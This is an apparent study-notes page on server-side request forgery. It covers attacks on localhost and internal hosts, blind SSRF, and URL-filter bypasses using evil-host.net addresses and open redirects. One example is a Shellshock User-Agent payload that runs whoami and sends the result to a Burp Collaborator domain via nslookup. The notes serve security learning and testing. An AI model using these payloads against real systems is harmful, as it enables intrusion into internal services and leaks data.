search
Page cover

SSRF

The website server make HTTP requests to the attacker domain.

Server side request forgery Induce the server-side application to make HTTP requests to an random domain of the attacker's choosing.

hashtag
Exploiting

hashtag
SSRF against the server itself

Attacker induces the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface for example: http://localhost/admin.

hashtag
SSRF against other back-end systems

Attacker can exploit the SSRF vulnerability to access the other interface by submitting a internal HTTP request (http://192.168.1.105/admin).

hashtag
Blind SSRF vulnerabilities

Response from the back-end request is not returned in the application's front-end response.

hashtag
Find vulnerability:

Observe a DNS look-up for the supplied Burp Collaborator domain.

hashtag
Example (Blind SSRF with Shellshock exploitation):

GET /path TTP/1.1
Host: test.net
...
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).aaabbbcccdddeeefff.burpcollaborator.net
...
Referer: http://192.168.0.1:8080
Upgrade-Insecure-Requests: 1
Connection: close

hashtag
Bypass

hashtag
Bypass blacklist-based

hashtag
Change "127.0.0.1" to:

  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.

  • Obfuscating blocked strings using URL encoding or case variation.

hashtag
Example:

hashtag
Bypass whitelist-based

  • Using "@" char https://expected-host@evil-host.net

  • Using "#" char https://evil-host#expected-host.net

  • Create a invalid domain https://expected-host.evil-host.net

  • Use URL-encode characters to confuse the URL-parsing code http://localhost:80%2523@evil-host.net/admin

hashtag
Bypassing SSRF filters via open redirection

Example 1:

/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

Example 2:

If "/product/stock" vulnerable to SSRF and /nextProduct vulnerable to OpenRedirect, Then:

PreviousFile UploadNextClient Side

Last updated